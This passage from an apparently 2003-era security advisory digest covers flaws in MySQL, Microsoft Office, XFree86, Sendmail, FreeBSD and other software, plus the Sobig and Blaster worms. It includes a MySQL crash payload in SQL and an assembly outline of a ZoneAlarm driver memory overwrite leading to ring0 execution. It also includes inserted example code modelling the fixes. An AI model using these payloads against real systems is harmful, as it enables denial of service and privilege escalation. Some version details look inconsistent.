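    }
    return (int)words;
}

/* What the ACL loader should do with a raw Password field: a 4.0/3.23 hash
 * is exactly 16 hex characters, i.e. two words, so anything else in the
 * column is treated as corrupt instead of being decoded.  0 = ok, -1 = bad. */
int decode_password_field(const char *field, unsigned long salt[2])
{
    if (field == NULL || strlen(field) != 16) return -1;
    return get_salt_checked(salt, 2, field) == 2 ? 0 : -1;
}

/* Constructed 16-character hash value. */
int demo_valid_hash(void)
{
    unsigned long salt[2];
    return decode_password_field("5d2e19393cc5ef67", salt) == 0
           && salt[0] == 0x5d2e1939UL && salt[1] == 0x3cc5ef67UL;
}

/* Constructed oversized field: 9 groups of 8 digits, like the proof of
 * concept below.  The original code would write 9 words into a 2-element
 * array; both checked entry points refuse it. */
static const char wide_field[] =
    "12345678" "12345678" "12345678" "12345678" "12345678"
    "12345678" "12345678" "12345678" "12345678";

int demo_oversized_field(void)
{
    unsigned long salt[2];
    return decode_password_field(wide_field, salt);
}

int demo_oversized_decoder(void)
{
    unsigned long salt[2];
    return get_salt_checked(salt, 2, wide_field);
}
```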

Harmless proof of concept:

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log:

030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted

MySQL log: repeated

mysqld got signal 11;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong

Confirmed on OpenBSD 3.3-RELEASE, FreeBSD 4.8-STABLE and Gentoo Linux 1.4.


-----[ Affected versions ]-----

All versions of MySQL up to and including 4.0.14 are likely to be
vulnerable.

All versions of MySQL up to and including 3.0.57 are also likely to be
affected.

No workaround is available, but to mitigate the impact of this kind of vulnerability never let the
server run with "root" privileges. Create a dedicated user and add the --user=<dedicated user> command-line switch to start the daemon, or edit
your "my.cnf" file to achieve the same result. There is no loss of functionality when the server runs without root privileges.

Patches

http://www.mysql.com/downloads/mysql-4.0.html



Flaw in NetBIOS Could Lead to Information Disclosure

2003-09-05

Risk level: Low

Type: Information leakage

Source of info: Microsoft Security Team

Impact

Under certain conditions, the response to a NetBT Name Service 
query may, in addition to the typical reply, contain random data 
from the target system's memory. This data could, for example, be a 
segment of HTML if the user on the target system was using an 
Internet browser, or it could contain other types of data that 
exist in memory at the time that the target system responds to the 
NetBT Name Service query. 

Overview

Network basic input/output system (NetBIOS) is an application 
programming interface (API) that can be used by programs on a local 
area network (LAN). NetBIOS provides programs with a uniform set of 
commands for requesting the lower-level services required to manage 
names, conduct sessions, and send datagrams between nodes on a 
network. 

This vulnerability involves one of the NetBT (NetBIOS over TCP) 
services, namely, the NetBIOS Name Service (NBNS). NBNS is 
analogous to DNS in the TCP/IP world and it provides a way to find 
a system's IP address given its NetBIOS name, or vice versa. 

An attacker could seek to exploit this vulnerability by sending a 
NetBT Name Service query to the target system and then examine the 
response to see if it included any random data from that system's 
memory. 

If best security practices have been followed and port 137 UDP has 
been blocked at the firewall, Internet based attacks would not be 
possible.

Any information disclosure would be completely random.

By default, the Internet Connection Firewall (ICF), which is available with Windows XP and Windows Server 2003, blocks the ports that are used by NetBT.

To exploit this vulnerability, an attacker would have to be able to send a specially-crafted NetBT request to port 137 on the target system and then examine the response to see whether any
random data from that system's memory is included. In intranet environments, these ports are usually accessible, but systems that are connected to the Internet usually have these ports blocked 
by a firewall.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-034.asp
http://www.microsoft.com/security/security_bulletins/ms03-034.asp




Flaw in Microsoft Word Could Enable Macros to Run Automatically

2003-09-05

Risk level: Important

Type: flaw

Source of info: Microsoft Security Team

Impact

A vulnerability exists because it is possible for an attacker to 
craft a malicious document that will bypass the macro security 
model. If the document was opened, this flaw could allow a 
malicious macro embedded in the document to be executed 
automatically, regardless of the level at which macro security is 
set. The malicious macro could take the same actions that the user 
had permissions to carry out, such as adding, changing or deleting 
data or files, communicating with a web site or formatting the hard 
drive. 

Overview

A macro is a series of commands and instructions that can be 
grouped together as a single command to accomplish a task 
automatically. Microsoft Word supports the use of macros to allow 
the automation of commonly performed tasks. Since macros are 
executable code it is possible to misuse them, so Microsoft Word 
has a security model designed to validate whether a macro should be 
allowed to execute depending on the level of macro security the 
user has chosen.

The vulnerability could only be exploited by an attacker who 
persuaded a user to open a malicious document - there is no way for 
an attacker to force a malicious document to be opened.


The user must open the malicious document for an attacker to be successful. An attacker cannot force the document to be opened automatically. 

The vulnerability cannot be exploited automatically through e-mail. A user must open an attachment sent in e-mail for an e-mail borne attack to be successful. 

By default, Outlook 2002 blocks programmatic access to the Address Book. In addition, Outlook 98 and 2000 block programmatic access to the Outlook Address Book if the Outlook Email Security Update has been installed. Customers who use any of these products would not be at risk of propagating an e-mail borne attack that attempted to exploit this vulnerability. 

The vulnerability only affects Microsoft Word - other members of the Office product family are not affected. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-035.asp 
http://www.microsoft.com/security/security_bulletins/MS03-035.asp



Buffer Overrun in WordPerfect Converter Could Allow Code Execution

2003-09-05

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

There is a flaw in the way that the Microsoft WordPerfect 
converter handles Corel(r) WordPerfect documents. A security 
vulnerability results because the converter does not correctly 
validate certain parameters when it opens a WordPerfect document, 
which results in an unchecked buffer. As a result, an attacker 
could craft a malicious WordPerfect document that could allow 
code of their choice to be executed if an application that used 
the WordPerfect converter opened the document. Microsoft Word and 
Microsoft PowerPoint (which are part of the Office suite), 
FrontPage (which is available as part of the Office suite or 
separately), Publisher, and Microsoft Works Suite can all use the 
Microsoft Office WordPerfect converter. 

Overview

Microsoft Office provides a number of converters that allow users 
to import and edit files that use formats that are not native to 
Office. These converters are available as part of the default 
installation of Office and are also available separately in the 
Microsoft Office Converter Pack. These converters can be useful 
to organizations that use Office in a mixed environment with 
earlier versions of Office and other applications, including 
Office for the Macintosh and third-party productivity 
applications.  

The vulnerability could only be exploited by an attacker who persuaded a user to open a malicious WordPerfect document-there is no way for an attacker to force a malicious document to be 
opened or to trigger an attack automatically by sending an e-mail message. 

The user must open the malicious document for an attacker to be successful. An attacker cannot force the document to be opened 
automatically. 

The vulnerability cannot be exploited automatically through e-mail. A user must open an attachment that is sent in an e-mail 
message for an e-mail-borne attack to be successful.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-036.asp
http://www.microsoft.com/security/security_bulletins/ms03-036.asp



Flaw in Visual Basic for Applications Could Allow Arbitrary Code Execution

2003-09-05

Risk level: Critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

A flaw exists in the way VBA checks document properties passed to 
it when a document is opened by the host application. A buffer 
overrun exists which if exploited successfully could allow an 
attacker to execute code of their choice in the context of the 
logged on user. 

Overview

Microsoft VBA is a development technology for developing client desktop packaged applications and integrating them with existing data and systems. Microsoft VBA is based on the Microsoft Visual Basic development system. Microsoft Office products include VBA and make use of VBA to perform certain functions. VBA can also be 
used to build customized applications based around an existing host application. 


In order for an attack to be successful, a user would have to open a specially crafted document sent to them by an attacker. 
This document could be any type of document that supports VBA, such as a Word document, Excel spreadsheet, PowerPoint presentation. In the case where Microsoft Word is being used as the HTML e-mail editor for Microsoft Outlook, this document could be an e-mail, however the user would need to reply to, or forward the mail message in order for the vulnerability to be exploited. 

The user must open a document sent to them by an attacker in 
order for this vulnerability to be exploited. 

When Microsoft Word is being used as the HTML e-mail editor in Outlook, a user would need to reply to or forward a malicious e-mail document sent to them in order for this vulnerability to be 
exploited. 

An attacker's code could only run with the same rights as the logged on user. The specific privileges the attacker could gain through this vulnerability would therefore depend on the privileges granted to the user. 
Any limitations on a user's account, such as those applied through Group Policies, would also limit the actions of any arbitrary code executed by this vulnerability.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-037.asp
http://www.microsoft.com/security/security_bulletins/ms03-037.asp



Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution

2003-09-05

Risk level: Moderate

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

A vulnerability exists because of a flaw in the way that Snapshot 
Viewer validates parameters. Because the parameters are not correctly
checked, a buffer overrun can occur, which could allow an attacker to
execute the code of their choice in the security context of the 
logged-on user.

Overview

With Microsoft Access Snapshot Viewer, you can distribute a snapshot 
of a Microsoft Access database that allows the snapshot to be viewed 
without having Access installed. For example, a customer may want to 
send a supplier an invoice that is generated by using an Access 
database. With Microsoft Access Snapshot Viewer, the customer can 
package the database so that the supplier can view it and print it 
without having Access installed.

The Microsoft Access Snapshot Viewer is available with all versions 
of Access - though it is not installed by default - and is also 
available as a separate stand-alone. The Snapshot Viewer is 
implemented by using an ActiveX control.

For an attack to be successful, an attacker would have to persuade a 
user to visit a malicious Web site that is under the attacker's 
control.

The Microsoft Access Snapshot Viewer is not installed with 
Microsoft Office by default.

An attacker would need to persuade a user to visit a website under the attacker's control for an attack to be successful.

An attacker's code would run with the same permissions as the user. If a user's permissions were restricted the attacker would 
be similarly restricted.

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-038.asp
http://www.microsoft.com/security/security_bulletins/MS03-038.asp



Remote and local vulnerabilities in XFree86 font libraries

2003-09-01

Risk level: high

Type: Buffer overflow

Source of info: blexim

Impact

Several bugs in the font libraries of the current version
(4.3.0) of the XFree86 font libraries could potentially
lead to the execution of arbitrary code by a remote user in any process
which calls the functions in question. The functions are related to
the transfer and enumeration of fonts from font servers to clients.

Overview

Specifically, several variables passed from a font server to a client are not adequately checked,
allowing integer overflows to cause erroneous sizes of buffers to be calculated. These erroneous
calculations can lead to buffers on the heap and stack overflowing, potentially leading to
arbitrary code execution.

The risk is limited by the fact that only clients can be affected remotely by these bugs, but in some (non default)
configurations, both xfs and XServer can act as clients to remote font servers.
In these configurations, both xfs and XServer could be potentially compromised
remotely.  

Also, it is possible for a local unprivileged user to alter the configuration of Xserver in such a
manner as to force it to load a font from an arbitrary font server. Since Xserver is setuid root by
default, a local user may potentially gain root privileges.


Patches

The current CVS version of XFree86 has been updated to correct these issues.



Sendmail DNS Map Vulnerability

2003-08-27

Risk level: high

Type: Remote DoS

Source of info: SGI Security Team

Impact

It's been reported by sendmail.org that there is a potential problem in the sendmail 8.12 series with 
respect to DNS maps in sendmail 8.12.8 and earlier
sendmail 8.12.x versions.

Overview

SGI ships sendmail 8.12.5 with IRIX 6.5.19 and later. The bug did not exist
in versions before 8.12 as the DNS map type is new to 8.12.x versions.
This bug could potentially be exploited to cause a Denial of Service.
There may be a possibility of using it to gain remote root access.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0688 to this issue:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0688

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in patches and in future releases of IRIX.

The sendmail binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

SGI has provided a series of patches for these vulnerabilities and
recommend to upgrade to IRIX 6.5.22 (when available), or install the
appropriate patch.

Patches

ftp://patches.sgi.com/support/free/security/



Worm W32.Sobig.F@mm under attack

2003-08-22

Risk level: high

Type: Worm

Source of info: Symantec

Impact

W32.Sobig.F@mm is a mass-mailing, network-aware worm that uses its own SMTP engine to propagate and attempts to create a copy of itself on accessible network shares.

Overview

Due to the number of submissions received from customers, Symantec Security Response has upgraded this threat to a Category 4 from a Category 3 threat as of August 21, 2003.

W32.Sobig.F@mm is a mass-mailing, network-aware worm that sends itself to all the email addresses it finds in the files that have the following extensions:

    * .dbx
    * .eml
    * .hlp
    * .htm
    * .html
    * .mht
    * .wab
    * .txt


The worm uses its own SMTP engine to propagate and attempts to create a copy of itself on accessible network shares, but fails due to bugs in the code.


Email routine details
The email message has the following characteristics:

From: Spoofed address (which means that the sender in the "From" field is most likely not the real sender). The worm may also use the address admin@internet.com as the sender.

    NOTES:
        o The spoofed addresses and the Send To addresses are both taken from the files found on the computer. Also, the worm may use the infected computer's settings to check for an SMTP server to contact.
        o The choice of the internet.com domain appears to be arbitrary and does not have any connection to the actual domain or its parent company.


Subject:

    * Re: Details
    * Re: Approved
    * Re: Re: My details
    * Re: Thank you!
    * Re: That movie
    * Re: Wicked screensaver
    * Re: Your application
    * Thank you!
    * Your details


Body:

    * See the attached file for details
    * Please see the attached file for details.


Attachment:

    * your_document.pif
    * document_all.pif
    * thank_you.pif
    * your_details.pif
    * details.pif
    * document_9446.pif
    * application.pif
    * wicked_scr.scr
    * movie0045.pif



NOTES:

    * The worm de-activates on September 10, 2003. The last day on which the worm will spread is September 9, 2003.
    * W32.Sobig.F@mm uses a technique known as "email spoofing," by which the worm randomly selects an address it finds on an infected computer.

For details see:
http://securityresponse.symantec.com/avcenter/venc/data/w32.sobig.f@mm.html
http://www.mks.com.pl/baza.html?show=description&id=2425



Unchecked Buffer in MDAC Function Could Enable System Compromise (Windows)

2003-08-20

Risk level: Important

Type: unchecked buffer

Source of info: Microsoft Security Team

Impact

It is possible to run code of the attacker's choice using unchecked buffer in Microsoft Data Access Components (MDAC). MDAC is a collection of 
components that are used to provide database connectivity on 
Windows platforms. MDAC is a ubiquitous technology, and it is 
likely to be present on most Windows systems.

Overview

Microsoft Data Access Components (MDAC) is a collection of 
components that are used to provide database connectivity on 
Windows platforms. MDAC is a ubiquitous technology, and it is 
likely to be present on most Windows systems:
 
 - MDAC is included by default as part of Microsoft
   Windows XP, Windows 2000, Windows Millennium Edition, and
   Windows Server 2003. (It is worth noting, though, that the
   version that is installed by Windows Server 2003 does not have
   this vulnerability.) 
 - MDAC is available for download as a stand-alone technology. 
 - MDAC is either included in or installed by a number of other
   products and technologies. For example, MDAC is included in
   the Microsoft Windows NT(r) 4.0 Option Pack and in Microsoft SQL
   Server 2000. Additionally, some MDAC components are present as
   part of Microsoft Internet Explorer even when MDAC itself is
   not installed.
 
MDAC provides the underlying functionality for a number of 
database operations, such as connecting to remote databases and 
returning data to a client. When a client system on a network 
tries to see list of computers that are running SQL Server and 
that reside on the network, it sends a broadcast request to all 
the devices that are on the network. Due to a flaw in a specific 
MDAC component, an attacker could respond with a specially 
crafted packet that could cause a buffer overflow.
 
An attacker who successfully exploited this flaw could gain the 
same level of privileges over the system as the application that 
initiated the broadcast request. The actions an attacker could 
carry out would be dependent on the permissions which the 
application using MDAC ran under. If the application ran with 
limited privileges, an attacker would be limited accordingly; 
however, if the application runs under the local system context, 
the attacker would have the same level of permissions. This could 
include creating, modifying, or deleting data on the system, or 
reconfiguring the system. This could also include reformatting 
the hard disk or running programs of the attacker's choice. 

This bulletin supersedes the patch discussed in MS02-040. 
Customers should install this patch as it contains the fix for 
the vulnerability discussed in bulletin MS02-040 as well as the fix 
discussed in this bulletin. 

Mitigating Factors:
====================
 - For an attack to be successful an attacker would need to
   simulate a SQL server on the same subnet as the target system. 
 - Code executed on the client system would only run under the
   privileges of the logged-on user. 
 - MDAC version 2.8 (which is the version included with Windows
   Server 2003) does not contain the flaw that is addressed by
   this bulletin. 

Patches

http://www.microsoft.com/security/security_bulletins/ms03-033.asp




Cumulative Patch for Internet Explorer

2003-08-20

Risk level: Critical

Type: many types

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 
6.0. In addition, it eliminates newly discovered vulnerabilities. 


Overview

The patch eliminates the following newly discovered vulnerabilities: 


 - A vulnerability involving the cross-domain security model of Internet Explorer, which keeps
   windows of different domains from sharing information. This flaw could result in the execution
   of script in the My Computer zone. To exploit this flaw, an attacker would have to host a
   malicious Web site that contained a Web page designed to exploit this particular vulnerability
   and then persuade a user to visit that site. After the user has visited the malicious Web site,
   it would be possible for the attacker to run malicious script by misusing the method Internet
   Explorer uses to retrieve files from the browser cache, and cause that script to access
   information in a different domain. In the worst case, this could enable the Web site operator
   to load malicious script code onto a user's system in the security context of the My Computer
   zone. In addition, this flaw could also enable an attacker to run an executable file that was
   already present on the local system or view files on the computer. The flaw exists because a
   file from the Internet or intranet with a maliciously constructed URL can appear in the browser
   cache running in the My Computer zone. 

 - A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server. It 
could be possible for an attacker who exploited this 
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user 
action. An attacker could also craft an HTML-based e-mail that 
would attempt to exploit this vulnerability. 

This patch also sets the Kill Bit on the BR549.DLL ActiveX 
control. This control implemented support for the Windows 
Reporting Tool, which is no longer supported by Internet 
Explorer. The control has been found to contain a security 
vulnerability. To protect customers who have this control 
installed, the patch prevents the control from running or from 
being reintroduced onto users' systems by setting the Kill Bit 
for this control. This issue is discussed further in Microsoft 
Knowledge Base article 822925. 

In addition to these vulnerabilities, a change has been made to 
the way Internet Explorer renders HTML files. This change 
addresses a flaw in the way Internet Explorer renders Web pages 
that could cause the browser or Outlook Express to fail. Internet 
Explorer does not properly render an input type tag. A user 
visiting an attacker's Web site could allow the attacker to 
exploit the vulnerability by viewing the site. In addition, an 
attacker could craft a specially formed HTML-based e-mail that 
could cause Outlook Express to fail when the e-mail was opened or 
previewed.

This patch also contains a modification to the fix for the Object 
Type vulnerability (CAN-2003-0344) corrected in Microsoft 
Security Bulletin MS03-020. The modification corrects the 
behavior of the fix to prevent the attack on specific languages.

To exploit these flaws, the attacker would have to create a 
specially formed HTML-based e-mail and send it to the user. 
Alternatively an attacker would have to host a malicious Web site 
that contained a Web page designed to exploit these 
vulnerabilities. The attacker would then have to persuade a user 
to visit that site. 

As with the previous Internet Explorer cumulative patches 
released with bulletins MS03-004, MS03-015, and MS03-020 this 
cumulative patch will cause window.showHelp( ) to cease to 
function if you have not applied the HTML Help update. If you 
have installed the updated HTML Help control from Knowledge Base 
article 811630, you will still be able to use HTML Help 
functionality after applying this patch. 

For more details see:
http://www.microsoft.com/technet/security/bulletin/ms03-032

Patches

 http://www.microsoft.com/technet/security/bulletin/ms03-032.asp



Checkpoint/Restart Vulnerability on Irix

2003-08-15

Risk level: high

Type: file permissions compromise

Source of info: SGI Security Team

Impact

It has been reported that the checkpoint/restart (cpr) system has a security
vulnerability whereby normal users can truncate or overwrite certain files
for which they do not have appropriate permissions.

Overview

The 32 bit versions of libcpr are installed by default on IRIX 6.5 systems
as part of the optional eoe.sw.cpr package.  The 64 bit version is part of
the optional eoe.sw64.lib package which is installed by default on 64 bit
systems.

A local account on the system would be required to exploit this vulnerability.

The vulnerability exists within the 32 bit and 64 bit versions of the libcpr
library and therefore binaries that load that library may exhibit the
vulnerability.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of IRIX.

For more info see:
ftp://patches.sgi.com/support/free/security/advisories/20030802-01-P

Patches

http://support.sgi.com
ftp://patches.sgi.com/support/free/security/patches/



Denial of Service Vulnerability in NFS on Irix

2003-08-13

Risk level: high

Type: Remote DoS

Source of info: SGI Security Team

Impact

It's been reported that it is possible to create a Denial of Service attack
on the IRIX nfsd through the use of carefully crafted packets which cause
XDR decoding errors. This can lead to kernel panicing the system.  No local account or access to an NFS mount point is required, so this could be constructed as a remote exploit.

Overview

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of IRIX.


SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.20, or install the appropriate
patch (5229, 5230, 5240, 5241, 5227, 5228)

Patches

http://www.sgi.com/support/security/ 
ftp://patches.sgi.com/support/free/security/patches/




New Worm: W32.Blaster.worm exploits DCOM RPC vulnerability

2003-08-13

Risk level: high

Type: Worm

Source of info: Symantec

Impact

A worm has been
discovered in the wild that exploits the Microsoft Windows DCOM RPC
Interface Buffer Overrun Vulnerability (Bugtraq ID 8205) to infect
host systems.  Symantec has been tracking its activity and is
currently conducting analysis/full disassembly of the malicious code,
which has been named "Blaster".  

The results of the analysis are
being made available to the public at the following location:

https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf

Overview

It is expected that this report will be updated frequently as more
information is discovered. Readers are advised to download/refresh it
throughout the day to ensure that no new information is missed.





Kernel memory disclosure in FreeBSD

2003-08-11

Risk level: high

Type: Information leakage

Source of info: FreeBSD Project Team

Impact

If iBCS2 support were enabled, a malicious user could call the iBCS2
version of statfs(2) with an arbitrarily large length parameter,
causing the kernel to return a large portion of kernel memory.  Such
memory might contain sensitive information, such as portions of the
file cache or terminal buffers.  This information might be directly
useful, or it might be leveraged to obtain elevated privileges in some
way.  For example, a terminal buffer might include a user-entered
password.

Overview

FreeBSD contains a kernel option (IBCS2) and kernel loadable module
(ibcs2.ko) that provide system call translation for running Intel
Binary Compatibility Specification 2 (iBCS2) compliant programs.
It is not enabled in FreeBSD by default.

II.  Problem Description

The iBCS2 system call translator for statfs(2) erroneously used the
user-supplied length parameter when copying a kernel data structure
into userland.  If the length parameter were larger than required,
then instead of copying only the statfs-related data structure,
additional kernel memory would also be made available to the user.

iBCS2 support is only present if the system administrator has enabled
it by including `option IBCS2' in the kernel configuration file, or
loaded it dynamically using kldload(8) or by setting `ibcs2_enable' in
rc.conf(5).
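The kernel-side mistake, as an added example that is not FreeBSD's code: a userland model of the iBCS2 statfs(2) translator's copy to userland, with the unclamped copy beside the clamped one. The structure layout, the neighbouring secret and every identifier (struct kmem, KMEM_SECRET, ibcs2_statfs_copy_vuln/_fixed) are assumptions made for the example; memcpy stands in for copyout(9).

```c
/*
 * Added example, not FreeBSD code. It models the iBCS2 statfs(2) translator's
 * copy-to-userland step: the vulnerable form copies as many bytes as the
 * caller asked for, the fixed form never copies more than the structure the
 * call is defined to return. Kernel memory is a plain struct here and memcpy
 * stands in for copyout(9). All names below are this example's own.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct ibcs2_statfs {            /* assumed small layout, not the real one */
    uint32_t f_bsize;
    uint32_t f_blocks;
    uint32_t f_bfree;
};

/* Something sensitive that happens to sit right after the statfs result,
 * like the terminal buffer holding a typed password the advisory mentions. */
static const char KMEM_SECRET[] = "tty: hunter2\n";

struct kmem {                    /* simulated slice of kernel address space */
    struct ibcs2_statfs sb;
    char neighbour[sizeof KMEM_SECRET];
};

static void kmem_init(struct kmem *k)
{
    k->sb.f_bsize = 4096;
    k->sb.f_blocks = 1000;
    k->sb.f_bfree = 250;
    memcpy(k->neighbour, KMEM_SECRET, sizeof KMEM_SECRET);
}

/* Vulnerable: trusts the user-supplied length. */
static size_t ibcs2_statfs_copy_vuln(const struct kmem *k, void *ubuf, size_t ulen)
{
    memcpy(ubuf, k, ulen);       /* ulen > sizeof k->sb reads into neighbour */
    return ulen;
}

/* Fixed: clamp to the size of the object actually being returned. */
static size_t ibcs2_statfs_copy_fixed(const struct kmem *k, void *ubuf, size_t ulen)
{
    size_t n = ulen < sizeof k->sb ? ulen : sizeof k->sb;
    memcpy(ubuf, &k->sb, n);
    return n;
}

/* 1 if the bytes handed to userland contain the neighbouring secret. */
static int leaks_secret(const unsigned char *ubuf, size_t n)
{
    size_t slen = sizeof KMEM_SECRET - 1;
    for (size_t i = 0; i + slen <= n; i++)
        if (memcmp(ubuf + i, KMEM_SECRET, slen) == 0)
            return 1;
    return 0;
}

/* Asks both variants for the whole simulated region. Returns a bit mask:
 * bit 0 set = vulnerable variant leaked, bit 1 set = fixed variant leaked. */
int ibcs2_demo(void)
{
    struct kmem k;
    unsigned char ubuf[sizeof k];
    int r = 0;
    kmem_init(&k);
    if (leaks_secret(ubuf, ibcs2_statfs_copy_vuln(&k, ubuf, sizeof k)))
        r |= 1;
    memset(ubuf, 0, sizeof ubuf);
    if (leaks_secret(ubuf, ibcs2_statfs_copy_fixed(&k, ubuf, sizeof k)))
        r |= 2;
    return r;
}

/* Bytes the fixed variant hands back for a request of `requested` bytes. */
size_t ibcs2_fixed_len(size_t requested)
{
    struct kmem k;
    unsigned char ubuf[sizeof k];
    kmem_init(&k);
    return ibcs2_statfs_copy_fixed(&k, ubuf, requested);
}

int main(void)
{
    printf("leak mask: %d (1 means only the unclamped copy leaked)\n", ibcs2_demo());
    printf("fixed copy for a 4096-byte request: %zu bytes\n", ibcs2_fixed_len(4096));
    return 0;
}
```

The fixed variant returns at most sizeof(struct ibcs2_statfs) bytes however large the request, which is the whole of the fix: a translation layer must size the copy by the object it is returning, never by a length the caller chose.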

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:10/ibcs2.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:10/ibcs2.patch.asc



Cisco CSS 11000 Series DoS

2003-08-07

Risk level: medium

Type: Remote DoS

Source of info: s21sec

Impact

A heavy storm of TCP SYN packets directed to the circuit address of the CSS
can cause a DoS on it: high CPU load or even sudden reboots.

Overview

The issue is known by Cisco as the ONDM Ping failure (CSCdz00787). On the
CS800 chassis the system controller module (SCM) sends ONDM (online
diagnostics monitor) pings to each SFP card to check that they are alive; if
the SCM does not get a response within about 30 seconds, the SCM reboots the
CS800 and no core is produced.

By attacking the circuit IP address of the CSS with SYN packets, the traffic
is sent up to the SCM over the internal MADLAN ethernet interface. If this
internal interface becomes overloaded, the ONDM ping request and response
traffic can be dropped, leading to an internal DoS since no internal
communications are available.

Any attacker could do this externally with a few sessions of NMAP over a
cable/ADSL internet connection.

This vulnerability affects the models 11800, 11150 and 11050 with the CS800
chassis.


Patches

http://www.cisco.com/en/US/products/hw/contnetw/ps789/prod_release_note09186a008014ee04.html



Zone alarm device driver vulnerability

2003-08-04

Risk level: medium

Type: local system compromise

Source of info: sec-labs

Impact

The driver installed with ZoneAlarm is vulnerable; by exploiting it an
attacker can gain full system control (ring0 privileges). In the worst case
for the attacker, the OS faults.


Overview

The driver installed with ZoneAlarm is vulnerable; by exploiting it an
   attacker can gain full system control (ring0 privileges).

   By sending a properly formatted message to the ZoneAlarm device driver
   (VSDATANT, the TrueVector Device Driver) you can cause a memory
   overwrite inside the driver.

   In outline, sending faked buffers with a specific signal can lead to
   arbitrary code execution:

   The first signal is sent to overwrite a specific memory location; in
   this case it can be one of the case/if statements.

     push 0                              ; lpOverlapped
     push offset bytes_returned          ; lpBytesReturned
     push 4                              ; nOutBufferSize
     push STATMENT_INSTRUCTION_POINTER   ; lpOutBuffer: memory to overwrite
     push 0                              ; nInBufferSize
     push 0                              ; lpInBuffer
     push 8400000fh                      ; dwIoControlCode (guess what X-D)
     push vsdatant_handle                ; hDevice
     call DeviceIoControl                ; send it!


   If the correct STATMENT_INSTRUCTION_POINTER is supplied, the address
   will be overwritten with 00060001h (for example). After allocating
   memory at this address and placing shellcode there, a second signal
   must be sent to jump into the inserted code. That can be done by
   sending another signal:


     LpInBuffer:
     db STATMENT_OVERWRITTEN_NUMBER      ; where to jump
     db 7 dup (0)                        ; data?
     dd temp_buff                        ; temp buffer
     db 10 dup (0)                       ; some space

   This one should be sent with another dwIoControlCode; however, we are
   no longer publishing any exploits, not even a PoC (die kiddies).

   After the second faked message is sent, the device driver jumps to the
   STATEMENT offset that was overwritten by the first "signal".
     




Single byte buffer overflow in FreeBSD realpath(3) [previously reported as error in wu-ftpd]

2003-08-04

Risk level: high

Type: Buffer overflow

Source of info: FreeBSD Project Team

Impact

Applications using realpath(3) MAY be vulnerable to denial of service
attacks, remote code execution, and/or privilege escalation.  The
impact on an individual application is highly dependent upon the
source of the pathname passed to realpath, the position of the output
buffer on the stack, the architecture on which the application is
running, and other factors.

Overview

I.   Background

The realpath(3) function is used to determine the canonical,
absolute pathname from a given pathname which may contain extra
``/'' characters, references to ``/./'' or ``/../'', or references
to symbolic links.  The realpath(3) function is part of the FreeBSD
Standard C Library.

II.  Problem Description

An off-by-one error exists in the portion of realpath(3) that computes
the length of the resolved pathname.  As a result, if the resolved
path name is exactly 1024 characters long and contains at least
two directory separators, realpath(3) writes a single NUL byte one
past the end of the buffer passed to it.

Within the FreeBSD base system, several applications use realpath(3).
Two applications which are negatively impacted are:

(1) lukemftpd(8), an alternative FTP server: realpath(3) is used to
    process the MLST and MLSD commands.  [lukemftpd(8) is not built or
    installed by default.]

(2) sftp-server(8), part of OpenSSH: realpath(3) is used to process
    chdir commands.

In both of the cases above, the realpath(3) vulnerability may be
exploitable, leading to arbitrary code execution with the privileges
of the authenticated user.  This is probably only of concern on
otherwise `closed' servers, e.g. servers without shell access.

At the time of 4.8-RELEASE, the FreeBSD Ports Collection contained
the following applications which appear to use realpath(3).  These
applications have not been audited, and may or may not be vulnerable.
There may be additional applications in the FreeBSD Ports Collection
that use realpath(3), particularly statically-linked applications and
applications added since 4.8-RELEASE.

BitchX-1.0c19_1
Mowitz-0.2.1_1
XFree86-clients-4.3.0_1
abcache-0.14
aim-1.5.234
analog-5.24,1
anjuta-1.0.1_1
aolserver-3.4.2
argus-2.0.5
arm-rtems-gdb-5.2_1
avr-gdb-5.2.1
ccache-2.1.1
cdparanoia-3.9.8_4
cfengine-1.6.3_4
cfengine2-2.0.3
cmake-1.4.7
comserv-1.4.3
criticalmass-0.97
dedit-0.6.2.3_1
drweb_postfix-4.29.10a
drweb-4.29.2
